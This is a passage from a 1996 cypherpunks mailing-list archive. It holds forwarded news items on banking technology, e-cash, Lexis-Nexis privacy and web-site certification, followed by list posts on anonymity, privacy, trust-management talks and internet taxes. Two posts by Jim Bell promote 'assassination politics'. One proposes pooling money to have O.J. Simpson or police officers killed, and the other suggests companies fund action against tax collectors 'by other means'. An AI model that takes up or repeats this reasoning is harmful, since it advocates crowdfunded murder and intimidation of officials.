powerhouse. Clearly, though, trouble lies ahead for banks. The endgame of the recent bank merger wave looks pretty bleak. Eventually, some eight to 12 banking behemoths will blanket the country. These giants will look, act and smell the same to consumers. Absent some sort of blockbuster development, the entire industry seems headed for the same fate suffered recently by the large retailers. But that blockbuster development is inevitable, and it surely will be driven by information technology. Technology at least the leading-edge stuff that creates monster opportunities isn't most banking executives' major stock-in-trade, so they don't even know where their future competitors are going to come from. To be sure, banks are trying some new tricks as they scrounge for growth. Some, for instance, are using automated teller machines to dispense coupons and sell event tickets. Not a bad idea, but it still doesn't solve the core problem. Electronic home banking software seems a better fit, but so far, it has generated me-too products and little profit. Meanwhile, bankers' favorite retail customers cash-rich individuals with low transaction activity are a threatened species. Taking money from these customers and lending it to free-spending Baby Boomers is really the heart of retail banking nowadays. But families who inherit such liquid assets from their parents are likely to apply much of this loot to debt reduction. The problem is that consumers don't perceive high value in generic banking services, and with good reason. As surely as you're reading this, within a generation we'll be carrying our financial assets around on some form of smart card. You'll deal with your depository bank much as you interact with the bank that issues your credit card. But the irony is that all this doesn't have to be the death knell for the banking industry. Banking executives simply need to worry less about high-tech rivals and more about the value they add to customer services. Take the lowly bank statement, for example. What if a bank offered small businesses the option of receiving their bank statements in electronic form, say, as an Excel spreadsheet file? Why not provide a listing of canceled checks for the entire fiscal year? The owner could then take this disk file, along with his check register, to his accountant. The accountant would then add data such as payee name and the date the check was written. For a small business that writes 100 checks per month, this could save a few hundred dollars in fees. That's a bank service that packs a punch, yet the incremental cost to the bank of providing the service would be very small. Numerous variations are possible. For instance, nonbusiness bank customers might find it useful to flag tax-deductible payments by putting an X in a box when they write the check. The bank can then provide a year-end listing of tax deductions a great headache-buster at tax time. It doesn't take advanced technology to deliver services such as these. What it takes is customer-oriented thinking, combined with simple awareness of how technology can support a new value proposition. So, while bankers should heed Andy Grove's "paranoia is good" message, they should worry less about technology threats and more about an industry culture that's rooted in an assumption of entitlement. Money Daily: Thursday, September 19, 1996 Privacy Storm Shows the Best and Worst of the 'Net By Michael Brush The flap over a new service from Lexis-Nexis is probably misguided, but raises interesting questions about privacy and the power of online communication. An online brouhaha that broke out this week over alleged privacy breaches caused by a new Lexis-Nexis product has put both the best and worst of the 'Net community in high profile. The Dayton, Ohio-based online database company has been swamped with phone calls and faxes this week because of a flurry of e-mails and news-group postings warning readers of the allegedly dire consequences of its new product called P- TRAK. Many of the warnings falsely claim that P-TRAK provides a wide range of potentially sensitive personal information ranging from social security numbers to medical and credit histories. On the bright side, the controversy shows the huge power of the 'Net when used by public-spirited advocates to mobilize a response to a perceived danger -- in this case, a threat to privacy. On the dark side, the fact that many of the allegations in the electronic correspondence are plain wrong shows how easy it is to spread misinformation and, potentially, raise what could amount to an online lynch mob. At issue is a product launched last June which provides Nexis-Lexis clients with basic public information about anyone in a 300 million-name database. The information available is culled from credit bureau records. It is limited to your name, your maiden name or alias (if any), your current and two most recent past addresses, the month and year of your birth, and your phone number -- though not all of that information is available on every person. For nine days after the product was released last June 2, P- TRAK also included your social security number. But the SSNs were pulled on June 11 because of complaints, says Lexis- Nexis spokesman Steve Edwards. If you already know someone's social security number, though, you can search for him or her using that number. P-TRAK is meant to help attorneys track down witnesses, heirs or parents who have stopped paying child support, says Edwards. While the scope of P-TRAK is relatively limited compared to, say, credit reports, which carry news of your payment history, bankruptcies and other such sensitive material, it nonetheless sparked the ire of many 'Net users. For example, one posting that was later widely circulated this week claimed that your social security number, "mother's maiden name, birth date and other personal information are now available to anyone with a credit card." It postulated that the information could allow someone to commit credit card fraud or use your identity. The truth is somewhat tamer. The SSN and mother's maiden name are not included, for example, and the database is available only to clients like law firms and news organizations that can afford Lexis-Nexis's relatively hefty fees. Furthermore, Money Daily's spot check shows that the information available is spotty at best. A search of P-TRAK run on our behalf by the Time Inc. Research Center turned up the right addresses but no phone or birth date for this author. It got the addresses and birth year correct for Money Daily editor Kevin McKean, but had an obsolete phone number. And when confronted with relatively more common names of two other Money Online staffers -- tech director Wilson Smith and reporter Joseph "Tripp" Reynolds -- turned up dozens of people, none of whom proved to be the correct ones. Those limitations notwithstanding, the roar on the 'Net was heard at Lexis-Nexis headquarters. "We have been deluged with people calling, writing and faxing," says Edwards. "People are asking us: 'Why are you putting my medical records, my mother's maiden name, and my credit card history out there?' This has been testing the limits of our customer service." In response, Lexis-Nexis posted a statement on its home page to correct false information about the product and also a form you can use to remove your name from the list, something the company says people could have done all along by calling. By next Monday, Edwards says the firm will also have an 800 number that callers can use. People who phone the company's current 800 number are told to fax name-removal requests to 513-865-1930. The company has stopped short of posting responses in news groups or bulletin boards, though. "There are different schools of thought on that," says Edwards. "One says that you should never respond to news groups from a company standpoint because that increases the amount of flaming. But at this point, I don't know how much worse it could get." In the company's place, other news group participants have stepped in to set the record straight. "I think you owe a post to correct this error," one such correspondent scolded in a reply that pointed out several errors in the message quoted above. Ironically, the information available in P-TRAK is mild compared to what is available elsewhere in the vast Lexis- Nexis database. A related product, called P-FIND, for example, offers additional household information like the appraised value of a home in many states and the number of dependents (both of which are public information). The main Nexis database digs up information from news stories -- often from local papers -- published around the world and in several different languages. Many of those stories, of course, contain information of arrests and charges that may later prove groundless, as well as a volume of personal information about the people cited in the articles. And the legal Lexis service contains not only details from civil and criminal court cases around the nation, but also other potentially sensitive information, such as tax liens and judgments against individuals. Before you get your hackles up over invasion of privacy, though, consider that all of the above is public information -- and, of course, much of it is potentially more sensitive than your previous address. For more Web-formation, visit: Lexis-Nexis (http://www.lexis-nexis.com ) Lexis-Nexis statement ( http://www.lexis-nexis.com/lncc/p-trak/index.html) Form to remove your name from the Lexis-Nexus database (http://www.lexis-nexis.com/lncc/about/ptrak.html) Reuters: Friday, September 20, 1996 Summers: Electronic Cash Won't Affect Economy Much The advent of electronic money is not expected to have any major macroeconomic effect in the medium term, U.S. Deputy Treasury Secretary Lawrence Summers said on Friday. "I do not anticipate in the near and medium term significant macro-economic effects," Summers told reporters following a speech to a conference on electronic money sponsored by the Treasury Department. Some analysts have speculated that the Federal Reserve's ability to conduct monetary policy may be undermined by the issuance of electronic money over the Internet or elsewhere. Others have suggested that the Fed and Treasury could lose profits from seigniorage -- the income earned by currency issuers because currency pays no interest to holders. Summers though played down both those concerns. He noted that much U.S. currency is held abroad and said electronic money is unlikely to substitute for that anytime soon. As for monetary policy, it already works indirectly through open market operations, he noted. "As we move from credit cards to debit cards to stored value cards, I think the Fed will continue to have the ability, by operating in the government securities market, to have a substantial influence on the level of interest rates," Summers said. He saw macroeconomic benefits to be gained from the advent of electronic money and stored value. If, like credit cards, they make it easier for consumers to purchase goods during economic downturns, then they can act as a stabilizing force on consumption. "To the extent that these technologies and the Internet make markets more competitive, they will tend to ... be a force against inflation," he added. Reuters: Wednesday, September 18, 1996 Germany to Let Only Banks Issue E-Cash By Catherine O'Mahony Bundesbank council member Franz-Christoph Zeitler on Wednesday welcomed government plans to give only banks the right to issue pre-paid cards or so-called electronic purses. Stressing the German central bank's concern about electronic money, he said banks were the safest guardians of electronic cash systems since they had to meet legally-imposed liquidity restrictions and had long experience of cashless payments. Zeitler said in a statement that electronic money innovations were fundamentally positive as a way to speed up transfers. But "it is also important that the security of payment transfers and currency stability do not get left behind," he added. Electronic purses are plastic cards with an inbuilt micro-chip which stores the electronic cash value of users' accounts and can be reloaded at special machines. The proposal to restrict such projects to banks is part of a new German banking law which is still under preparation but which is expected to be enforced in 1997. Zeitler said issuers of electronic cash had to be extremely reliable because a sudden collapse of an electronic cash system, due to forgery or technical failure, could have "significant negative" consequences for the economy. While electronic purses, also known as smart cards, are not yet available in cash-dominated Germany, tests are being run on several projects. Current projects being tested in the Munich region include a card to pay for telephone calls and local train tickets and another with broader application, which can be used for small purchases up to 50 marks ($ 33.03). Worldwide, the most prominent electronic purse project is Mondex which was developed in Britain by National Westminster Bank and is on trial in the town of Swindon. Zeitler said it was likely that Bonn would also restrict the rights to create and maintain of Internet-based electronic cash systems to the banking industry. Internet banking is slowly gaining credence in Germany. Bavaria's Bayerische Hypotheken und Wechsel Bank recently launched a securities account accessible via the Internet. ($ 1=1.5138 Mark) American Banker: Thursday, September 19, 1996 Seeking Security, Banks Turn to Internet Certification By DREW CLARK On the Internet, no one can tell if you're a dog. This line, from a New Yorker cartoon, belies a serious problem for banks and merchants setting up sites on the World Wide Web: There is no widely accepted method for authenticating the claims -- or the identity -- of those conducting business on-line. To help solve this problem, two companies have begun certifying businesses by granting them "seals of approval" on the Web. "There needs to be some way that consumers can easily recognize when a site is secure and when it is not secure," said Michael S. Karlin, president of the Security First Network Bank. "Consumers are afraid, even in an FDIC-approved banking situation, and they want the feeling that it is secure." One of the first systems to offer authentication for commercial sites on the World Wide Web is TrueSite, developed by Application Programming and Development Inc. of Camp Springs, Md. BankAmerica Corp., Mellon Bank Corp., and First Bank System Inc. are among 30 financial institutions and 2,000 businesses whose Web sites have been certified. Though the Web provides businesses with a flexible, highly visible medium for presenting their message, on-line business has its drawbacks. A Web site user can download the entire contents of a Web page, alter it, and establish a dummy site at a new location. TrueSite guards against such occurrences by letting certified banks and businesses put a blue check mark symbol on their home pages for an annual fee of $495, which has been waived for six months. Users clicking on the logo will be warned if it has been fraudulently copied. "A user won't have to ask, 'Did I get to the correct site in the first place?,'" said Mark Burnett, president of Application Programming, which has annual revenues of $2 million. "Whether consumers feel comfortable engaging in transactions on the Internet is a function of how they feel," added Jack Rogers, president of the Fairfax, Va.-based American Finance & Investment Corp. "Their perception is as important as reality." Another certification was launched in July by the National Computer Security Association in Carlisle, Pa. The association requires that certified companies protect their Web sites against Internet attacks by using data encryption, by maintaining detailed logs, and by establishing firewalls within the computers that host Web sites. "You better have some confidence that a hacker doesn't have access to checking accounts," said Kevin J. Stevens, a product manager at the for- profit association, which has annual revenues of $5 million. "If banks don't take the steps to be certified and give their market some indication that they have instituted a security program, no public relations is going to resolve only one slip-up." So far six companies have each paid upwards of $8,500 for a detailed on- site audit before getting the association's stamp of approval. Mr. Stevens declined to identify them, but said they include one of the big three auto companies. "This is a great first step. What the NCSA has done is to put the bar up," said Security First's Mr. Karlin. He anticipates that the virtual bank will be certified within two months and hopes that the association will eventually introduce a system with several passing grades. America Online Inc. and the Better Business Bureau are also getting into the certification business. In conjunction with America Online's move to the New York Stock Exchange from Nasdaq, its top officials reemphasized the features of the largest on-line service and announced 10 new criteria that merchants will be required to meet. The standards include processing orders and responding to E-mails within one day of receipt and giving on-line customers equal priority with telephone customers. "AOL members will come to know and have confidence in people who display the seal of approval," said Michael J. Minigan, the service's vice president of interactive marketing. "It is our hope that at some point, merchants doing business on the Web would want to have the AOL seal on their Web sites." Officials at the Better Business Bureau promote self-regulation and full disclosure of company complaints to fill cues missing from on-line commerce. "For $30 a month, a business can design a fabulous Web page that can lead a consumer to think they are a Fortune 500 company," said spokeswoman Holly Cheriko. "The consumer is left without the cues in the traditional marketplace like being able to visit, talk to the sales clerk, and view the quality of the marketplace. They need a trusted means to determine which businesses are reliable and what commitment they have made to the consumer." --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From ponder at freenet.tlh.fl.us Mon Sep 30 21:34:22 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Tue, 1 Oct 1996 12:34:22 +0800 Subject: GPS Message-ID: The National [US] Academy of Sciences has a new web spot called 'Beyond Discovery' and one of the articles posted is about the Global Positioning System. You may observe same at: http://www2.nas.edu/bsi/20fe.html Oops: I just learned the name 'John Anonymous MacDonald' gets stuck on mail that goes through a certain remailer, no matter who sends it. And I thought it was one particular idiot. Turns out, it's any number of people, plus one particular idiot. -- to unsubscribe write to majordomo at toad.com with the words unsubscribe cypherpunks in the body (not the subject) of the message. From travel23 at juno.com Mon Sep 30 21:35:07 1996 From: travel23 at juno.com (The Traveler) Date: Tue, 1 Oct 1996 12:35:07 +0800 Subject: Katz on cypherpunks, in HotWired's Media Rant Message-ID: <19960930.191626.3558.0.travel23@juno.com> Declan McCullagh wrote: > >[Background: the cypherpunk/pw:cypherpunk account used for HotWired's >Threads discussion section has been used for anonymous flaming and >attacks. --Declan] > >HotWired >The Netizen >30 Sep 96 > > Cypherpunks don't want real confrontations or discussions, or they > would reveal their identities and make it possible to respond, as most > flamers do. They are among media's rarest and at the same time most > easily recognized subspecies: nihilists. Well, this really advances the cause for anonymous emailing. It's even more upsetting that, because one knucklehead used cypherpunks as his name and pw, his empty-headed rants become associated with the list and the concept. The primary point, however, is that right of privacy regarding anonymous email is being submerged by idiots who use it to stroke their miniscule egos. Look at how many remailers have gone under because of abuse - or, better yet, look at Georgia's new law regarding the use of nyms. Tied in with the right to privacy is the right of free speech. The problem is that the general public, with few exceptions, understand this. Most, I believe, would support the right to privacy; however, if they encounter anonymous flaming - especially if it is politically incorrect/profane/abusive, then we would hear the call for an immediate end to the right to privacy and a demand for the hanging of anonymity at high noon. From leegib at microsoft.com Mon Sep 30 21:57:14 1996 From: leegib at microsoft.com (Lee Gibbon) Date: Tue, 1 Oct 1996 12:57:14 +0800 Subject: FW: [INFO] Internet Privacy: Reflections on Europe in the Digital Age Message-ID: >-----Original Message----- >---------- > >this is probably obvious to many of you, but it is still interesting and >sobering to see the issue spelled out all in one place.... > >>---------- >> >>Forwarded-by: Phil Agre >> >>Date: Fri, 20 Sep 1996 19:16:19 +0200 >>From: steve at isys.hu (Steven Carlson) >>To: hungary-online-announce at hungary.yak.net >>Subject: (HOL-A) It's a Brave Old World >> >> ------------------------------ >> Brave Old World: >> Reflections on Europe in the Digital Age >> by Steven Carlson; 20 Sep 1996 >> ------------------------------ >> >> ** So Much Fuss About A Bottle Of Ketchup >> >> Hungarian police recently sent a fax around to the local Internet >> service providers (ISPs) asking them to provide lists of their users >> in Esztergom, a small town outside of Budapest. It seems somebody >> had planted a bomb in a bottle of ketchup. Since everyone knows you >> can download bomb-making instructions from the Internet, the police >> figured they should investigate the local users. No, I'm not making >> this up. >> >> What's more, nearly every local ISP gave the police this information. >> Fortunately my company has no users in Esztergom and so that's what we >> told the police. We got off lucky. Believe me, as much as might want >> to make a stand for privacy of information my company is NOT eager to >> do battle with the Hungarian authorities. >> >> But that's what it might take. Because if the Hungarian police really >> understood the Internet they could have asked for even more. For >> example, it would only take a few keystrokes to forward a users' mail >> to the authorities. The police might also have asked for old email, >> since many ISPs back this up routinely. >> >> But that's not all. Some ISPs run caching servers, machines that store >> frequently-viewed webpages so that users access them locally rather >> than across the net. An ISP's caching server could give the police a >> profile of what web pages the users have been browsing. >> >> I'm not trying to scare anyone. My point is that sharing information >> on the Internet is a two-way street. Computers keep extensive records. >> Using the Internet often means you leave a trail behind you. This is >> part of life in the digital age. >> >> This "electronic trail" is not unique to the Internet. Every time you >> use a credit card you create a record in several computers. Other >> computers may be storing information about you such as your medical >> history, driving record, tax filings and so on. The more we rely on >> computers to manage our affairs, the more information that may be "out >> there." This means citizens in the digital age should know their >> rights. >> >> Many governments already have laws to protect private information. For >> example, the US has many laws restricting access to sensitive >> information such as medical and credit records. You might be surprised >> to know Hungary passed a law in 1991 to prevent misuse of information >> associated with the national identity card. >> >> Yet the growth of new technologies is outpacing legislation. For >> example, Holland and other countries are experimenting with "smart >> road" systems that can identify the licence number of a moving car for >> purposes of toll collection. Cellular phones and satellite navigation >> systems can report the locations of their users. It's not difficult to >> imagine how these and other technologies could be abused. >> >> Of course, now you know that even your local Internet provider has >> access to some rather sensitive information about you. This leads me >> to ask: what sort of service is your Internet provider actually >> offering? >> >> When it comes down to it, your ISP is like your doctor, your lawyer, >> your accountant or your psychiatrist. Each of these professionals >> deals with your data; each profession is governed by a code of ethics, >> written or implicit. Moreover these limits are codified in law. If >> your accountant allowed your competitors to read the company books, >> you could take him to court. >> >> Similarly, your Internet provider has an implicit duty to protect the >> privacy of your communication. Most professionals in my industry >> recognize this. I know most of the people working in Hungarian >> Internet and I doubt very much that they are reading your mail or >> mine. But they don't know where they stand in the eyes of the law. >> >> Internet professionals should certainly assist the police in a >> legitimate investigation. But should every Internet user in Esztergom >> be investigated just because they could (theoretically) find >> bomb-making information on the Internet? >> >> To hammer that point home a local Internet-based magazine has >> published, in Hungarian, complete bomb-making instructions: >> . In other >> words, if you've read this far you may be the subject of a future >> investigation. Have a nice day! >> >> ** Further Links: >> >> The Electronic Frontier Foundation >> >> The International Electronic Rights Server >> >> The Electronic Privacy Information Center >> >> >> ---------------------------------------------------- >> Copyright (c) 1996. Permission granted to redistribute this article in >> electronic form for non-profit purposes only. My byline and this message >> must remain intact. Contact me for reprint rights. >>----------------------------------------------------- >> >> >> > From liberty at gate.net Mon Sep 30 22:07:37 1996 From: liberty at gate.net (Jim Ray) Date: Tue, 1 Oct 1996 13:07:37 +0800 Subject: ASAP letter on e-cash Message-ID: <199610010237.WAA52166@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Mon Sep 30 22:35:53 1996 Dustbin Freedom Remailer wrote: > >It seems our own Jim Ray has gotten published again, this time in Forbes >ASAP's letters section ((Oct.7, page 18). A bit partisan-Libertarian, Well, that's to be expected from me...Besides, Reason editor Virginia Postrel is a columnist there. >but good job, Jim. Thanks. They only cut it a little bit, and I hear it may appear somewhere electronically soon. If not, I'll dig for anyone interested. ASAP makes Forbes worth subscribing to, IMO. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/ ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMlCDjm1lp8bpvW01AQGNTQQAmQmKZZU8VQWRziV4LEyXxhCKThz2rilA k5gHDsEdkNNynvgd4luAUGEA1P3GGXnDVe3L7ByaCVjz8QksCDuPVM/MH1ZFMoVn pgMZZKkE+HjpDcUXJjRe88Duq8JJw4fZKfE4M+wxyyONQtsVF1+maut2HDzdrcU3 kbE1JQ10+qc= =n4Jb -----END PGP SIGNATURE----- From jya at pipeline.com Mon Sep 30 22:24:41 1996 From: jya at pipeline.com (John Young) Date: Tue, 1 Oct 1996 13:24:41 +0800 Subject: DIMACS Abstracts Message-ID: <199610010301.DAA25739@pipe3.ny2.usa.pipeline.com> We offer the ABSTRACTS of the presentations at: DIMACS Workshop on Trust Management in Networks September 30 - October 2, 1996 South Plainfield, NJ http://jya.com/dimacs.txt (80 kb) ftp://jya.com/pub/incoming/dimacs.txt Sorry, no E-mail. Here are the titles and authors: _________________________________________________________ Let A Thousand (Ten Thousand?) CAs Reign Stephen Kent, BBN Corporation _________________________________________________________ The PolicyMaker Approach to Trust Management Matt Blaze, Joan Feigenbaum, and Jack Lacy, AT&T Laboratories _________________________________________________________ SDSI -- A Simple Distributed Security Infrastructure Butler Lampson and Ron Rivest, Microsoft and MIT _________________________________________________________ SPKI Certificates Carl Ellison, Cybercash _________________________________________________________ Using PICS Labels for Trust Management Rohit Khare _________________________________________________________ Managing Trust in an Information-Labeling System M. Blaze (1), J. Feigenbaum (1), P. Resnick (1), M. Strauss (2), 1. AT&T Laboratories 2. AT&T Laboratories and Iowa State University _________________________________________________________ Trust Management In Web Browsers, Present and Future Drew Dean, Edward W. Felten, and Dan Wallach, Princeton University _________________________________________________________ IBM Cryptolopes, SuperDistribution and Digital Rights Management Marc A. Kaplan, IBM _________________________________________________________ Requirements and Approaches for Electronic Licenses David Maher, AT&T Laboratories _________________________________________________________ PathServer Michael Reiter and Stuart Stubblebine, AT&T Laboratories _________________________________________________________ Inferno Security David Presotto, Bell Labs, Lucent Technologies _________________________________________________________ Transparent Internet E-mail Security Raph Levien, Lewis McCarthy, and Matt Blaze, AT&T Laboratories _________________________________________________________ Cryptographically Secure Digital Time-Stamping to Support Trust Management Stuart Haber and Scott Stornetta, Bellcore and Surety Technologies (respectively) _________________________________________________________ Untrusted Third Parties: Key Management for the Prudent Mark Lomas and Bruno Crispo, Cambridge University _________________________________________________________ Distributed Commerce Transactions: Structuring Multi-Party Exchanges into Pair-wise Exchanges Steven Ketchpel and Hector Garcia-Molina, Stanford University _________________________________________________________ Policy-Controlled Cryptographic Key Release Dennis K. Branstad and David A. McGrew, Trusted Information Systems, Inc. _________________________________________________________ An X.509v3 Based Public-key Infrastructure for the Federal Government William Burr, National Institute of Standards and Technology _________________________________________________________ The ICE-TEL Public-Key Infrastructure and Trust Model David W. Chadwick [1], University of Salford _________________________________________________________ A Distributed Trust Model Alfarez Abdul-Rahman and Stephen Hailes, University College, London _________________________________________________________ On Multiple Statements from Trusted Sources Raphael Yahalom, Hebrew University and MIT _________________________________________________________ Off-line Delegation in a Distributed File Repository Arne Helme and Tage Stabell-Kulo, University of Twente and University of Troms _________________________________________________________ Operational Tradeoffs of Aggregating Attributes in Digital Certificates Ian Simpson, Carnegie Mellon University _________________________________________________________ Trust Management for Mobile Agents William M. Farmer, Joshua D. Guttman, and Vipin Swarup, MITRE _________________________________________________________ Trust Management in ERLink Samuel I. Schaen, Mitre _________________________________________________________ Linking trust with network reliability Yvo Desmedt and Mike Burmester, University of Wisconsin at Milwaukee and Royal Holloway College _________________________________________________________ Trust Management Under Law-Governed Interaction Naftaly H. Minsky and Victoria Ungureanu, Rutgers University _________________________________________________________ Tools for Security Policy Definition and Implementation P. Humenn, BlackWatch Technology, Inc. _________________________________________________________ http://jya.com/dimacs.txt (80 kb) ftp://jya.com/pub/incoming/dimacs.txt Sorry, no E-mail of this one. From jimbell at pacifier.com Mon Sep 30 22:27:42 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 1 Oct 1996 13:27:42 +0800 Subject: Internet plug pulled on Colombia's guerrillas Message-ID: <199610010257.TAA18377@mail.pacifier.com> At 07:04 AM 9/30/96, Chris Adams wrote: >On Fri, 27 Sep 1996 14:33:42 -0800, jim bell wrote: >>>The Communist insurgents, who rose up in arms in 1964, >>>embraced new technology last year in their fight to overthrow the >>>government by launching a home page on the Internet. >> >>I couldn't resist smiling when I read this. Not that I want their access >>cut; quite the opposite. But it is REALLY reassuring to see the authorities >>behave in exactly the fashion you expect them to! Attempting to cut off >>dissenting political voices IRL is de rigeur; now, this shows that they >>believe "threat" to the government posed by allowing others to voice >>contrary opinions on the 'net is real. > >It's particularly funny when you consider that the main justification for >suppression is that insurgents (or rebels or freedom fighters or ...) kill >people. Something along the lines of "We don't suppress unpopular views; >we're just protecting our citizens". Now, it seems to me that that having a >web page is a decidely non-lethal thing. For now, it is! >OTOH, it's probably more >effective at getting the outside world to find out what's happening. Draw >your own conclusions. Yes, if anything we should want these people to be able to communicate whenever they want. It would probably deter inappropriate violence, and further it would put pressure on the government to fix whatever problems legitimately need fixing. Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Mon Sep 30 22:38:04 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 1 Oct 1996 13:38:04 +0800 Subject: active practice in America Message-ID: <199610010319.UAA19992@mail.pacifier.com> At 08:45 AM 9/30/96 -0800, Timothy C. May wrote: >(Legal purists will point out that the second trial was for "Federal civil >rights violations." Harummphh. What would the Founders think of this logic: >"First we try them on ordinary criminal charges. If they are found Not >Guilty, we charge them in the next higher court with more abstract charges. >If they are still found found Not Guilty, we hit them with "civil rights" >and "being disrespectful to women" charges. And if that doesn't work, we >charge them in the World Court. We've only had one guilty party get past >them, and for that guy we appealed to the Pope and he put a Papal Hex on >the guy and ordered him burned in oil.") > >Double jeapardy means the system gets one shot at proving charges, not two >or three. > >(And, yes, even though I am sure O.J. Simpson killed those two people, I am >not happy with what appears to be a _second_ trial. For sure, it's a >_civil_ trial, for damages, but to this layman it looks like a second trial >on the main charges. I suppose I always thought that being found "Not >Guilty" on the act itself made it essentially impossible for a civil trial >to redecide the same issue. Boy, was I wrong.) As usual, I have a solution to this problem! (AP, for the relatively unitiated out there.) If people really believe OJ is guilty, just pool your shekels and see him dead. Or, if you believe the cops planted evidence, buy THEIR deaths via donation. (No cop would have dared risk AP to jump the wall...particularly if by doing so he risked having the evidence thrown out due to illegality. Nor would they have risked trying to frame an innocent person, or at least one believed innocent by a few million citizens.) Or do both. And so on... Notice, however, that if AP were operational, a lot might have turned out differently. First, if you assume that OJ is guilty, he would have KNOWN that he would be the first person suspected if Nicole were murdered. This would have been an enormous deterrent, because he would have known that he'd be a potential target even if he managed to commit the "perfect crime" and leave no evidence. However, it's even a bit more complicated that this. Anyone considering an AP donation against OJ would have to realize that he KNEW all this, and might have been appropriately deterred, and if Nicole was killed anyway it's quite possible it WASN'T OJ. Sure, thinking about this can give anyone a headache. That's because AP can't answer the question, "Is OJ guilty," but it could dramatically change the circumstances in which such questions are answered. Jim Bell jimbell at pacifier.com From omegaman at bigeasy.com Mon Sep 30 23:03:42 1996 From: omegaman at bigeasy.com (Omegaman) Date: Tue, 1 Oct 1996 14:03:42 +0800 Subject: Katz on cypherpunks, in HotWired's Media Rant In-Reply-To: Message-ID: On Mon, 30 Sep 1996, Timothy C. May wrote: > > Katz has no understanding of the difference between someone (or some bunch) > who use a name-password combination called "cypherpunks" with the > discussions on the _list_ called cypherpunks. No he does not. I pointed this out to him in private mail after reading the text of the "rant" at hotwired. He says that he makes the distinction a number of times throughout the article between "the person who logs in internally" from hotwired " and the "cypherpunks mailing group." I replied, "no, Jon, you did not...and I suspect that I am not the only reader of your article who thinks so." I will be most interested in his reply. > His comment, "Cypherpunks don't want real confrontations or discussions, or > they would reveal their identities and make it possible to respond, as most > flamers do. They are among media's rarest and at the same time most > easily recognized subspecies: nihilists." shows the same level of > sophistication as someone accusing Bill Clinton of misdeeds because > "whitehouse.gov" is used as a name/password for some forum. > > Someone this naive (or this disingenous, if he knows better) has no > business writing for anything about the Net. > > Once again, "Wired" and "HotWired" disgrace themselves. > > --Tim May > Anyone care to wager that he won't post any sort of correction or addendum in a later forum? me _______________________________________________________________ Omegaman PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2 59 0A 01 E3 AF 81 94 63 Send e-mail with "get key" in the "Subject:" field to get a copy of my public key _______________________________________________________________ From rah at shipwright.com Mon Sep 30 23:04:24 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 1 Oct 1996 14:04:24 +0800 Subject: Diffie Speaks at Sun^h^h^hMIT: "Cryptology, Technology, andPolitics" Message-ID: --- begin forwarded text X-Sender: rah at tiac.net Mime-Version: 1.0 Date: Mon, 30 Sep 1996 11:27:15 -0400 To: cypherpunks at toad.com From: Robert Hettinga Subject: Diffie Speaks at Sun: "Cryptology, Technology, and Politics" ^^^ MIT, of course... Sorry! Cheers, Bob ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From jimbell at pacifier.com Mon Sep 30 23:08:30 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 1 Oct 1996 14:08:30 +0800 Subject: [NEWS] More internet-tax proposals Message-ID: <199610010347.UAA22294@mail.pacifier.com> At 04:08 PM 9/30/96 EDT, E. Allen Smith wrote: >> INTERNET BEWARE: GOVERNMENTS ARE SMELLING A RICH NEW SOURCE OF TAXES >> Copyright © 1996 Nando.net >> Copyright © 1996 The Boston Globe >> So Netcom contacted state tax officials for clarification. Netcom's >> 500,000 customers are scattered throughout the United States, but the >> company is focusing on tax laws in Massachusetts and 14 other states >> where most of its customers dwell. Weatherford said he still had >> received no official word from Massachusetts, but Netcom attorneys had >> concluded the company is subject to the state's telecommunication >> sales tax. To play it safe, it will begin collecting the tax this >> month. > > Remind me not to sign up with Netcom. > >> It's probably a smart move. At the Massachusetts Department of >> Revenue, acting general counsel William Hazel told the Globe that >> Netcom and every other on-line service provider should be paying the >> sales tax. > >> "To the extent that folks are being charged for the ability to >> telecommunicate through the Internet... that's taxable," he said. Obligatory AP solution: If Netcom and every other telecommunications company doing business in Massachusetts were to pool their money, say a half a year of their normal payments, they could (in effect) buy an "AP Insurance Policy" which would guarantee that they wouldn't have to pay the tax...forever. Since Netcom is a known entity, all they'd have to do is to announce publicly that they are not going to pay the tax because they don't believe they owe it, but that they are going to allocate a certain proportion of its gross receipts into a fund to disable the tax collection...by "other means"...if it was ever tried. This would have to be a rather powerful deterrent to any state attorney considering opening up this can of worms. Jim Bell jimbell at pacifier.com From perry at piermont.com Mon Sep 30 23:09:47 1996 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 1 Oct 1996 14:09:47 +0800 Subject: Anonymous: Re: Phoenix News Message-ID: <199610010137.VAA23410@jekyll.piermont.com> Anyone else get one of these things in their mailbox? ------- Forwarded Message Date: Mon, 30 Sep 1996 01:04:21 +0200 (MET DST) Message-Id: <199609292304.BAA11993 at basement.replay.com> Subject: Re: Phoenix News Content-Type: TEXT/PLAIN; charset=US-ASCII To: perry at piermont.com From: nobody at REPLAY.COM (Anonymous) Organization: Replay and Company UnLimited XComm: Replay may or may not approve of the content of this posting XComm: Report misuse of this automated service to Perry Metzger, You will find in your inbox, maybe you already have, a posting made by me. I am the President and CEO of IPG. Included therein is my resume and various other explanatory materials. We are now in the position of being able to prove what we have only been able to contend up to now, I realize that probably do not believe that, but it is true nonetheless. I have personally dealt with thousands of OTPs during the last 40 years, and our product produces a legitimate true OTP, pure and simple. In those materials, you will also find an attack made on you and Bill Stewart. That attack is in retaliation to the snide remarks, and your highly stilted subjective opinions, and attacks that you and Bill have made on me and IPG in the past. I do not object to criticism, when I am wrong, but I do object to using just highly subjective opinions to attack me, or anyone for that 